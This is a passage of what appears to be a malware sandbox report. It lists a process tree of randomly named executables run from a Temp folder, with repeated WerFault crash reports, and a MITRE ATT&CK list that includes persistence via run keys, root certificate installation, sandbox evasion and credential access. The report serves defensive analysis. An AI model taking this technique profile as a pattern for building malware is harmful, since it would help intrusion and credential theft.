C:\Users\Admin\AppData\Local\Temp\1CE9.exe
C:\Users\Admin\AppData\Local\Temp\1CE9.exe
1⤵
PID:7964

C:\Users\Admin\AppData\Local\Temp\5E0A.exe
C:\Users\Admin\AppData\Local\Temp\5E0A.exe
1⤵
PID:9964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 7128 -ip 7128
1⤵
PID:10780

C:\Users\Admin\AppData\Local\Temp\C457.exe
C:\Users\Admin\AppData\Local\Temp\C457.exe
1⤵
PID:3628

C:\Users\Admin\AppData\Local\Temp\EE85.exe
C:\Users\Admin\AppData\Local\Temp\EE85.exe
1⤵
PID:9156
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 9156 -s 276
  2⤵
  - Program crash
  PID:13908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 9156 -ip 9156
1⤵
PID:13068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4860 -ip 4860
1⤵
PID:14160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 14652 -ip 14652
1⤵
PID:14528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2992 -ip 2992
1⤵
PID:16452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 17540 -ip 17540
1⤵
PID:19140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 19028 -ip 19028
1⤵
PID:18256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 17084 -ip 17084
1⤵
PID:18796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 21032 -ip 21032
1⤵
PID:14600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1448 -ip 1448
1⤵
PID:21464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 23548 -ip 23548
1⤵
PID:23012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 25492 -ip 25492
1⤵
PID:18256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10744 -ip 10744
1⤵
PID:17932

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 8268 -ip 8268
1⤵
PID:21656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7280 -ip 7280
1⤵
PID:27552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 20688 -ip 20688
1⤵
PID:22244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 22212 -ip 22212
1⤵
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 25248 -ip 25248
1⤵
PID:4808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 25896 -ip 25896
1⤵
PID:24664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 15188 -ip 15188
1⤵
PID:21652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 30200 -ip 30200
1⤵
PID:27784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 33584 -ip 33584
1⤵
PID:27692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 31260 -ip 31260
1⤵
PID:20452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 31800 -ip 31800
1⤵
PID:9992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 24264 -ip 24264
1⤵
PID:13000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6596 -ip 6596
1⤵
PID:24200

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery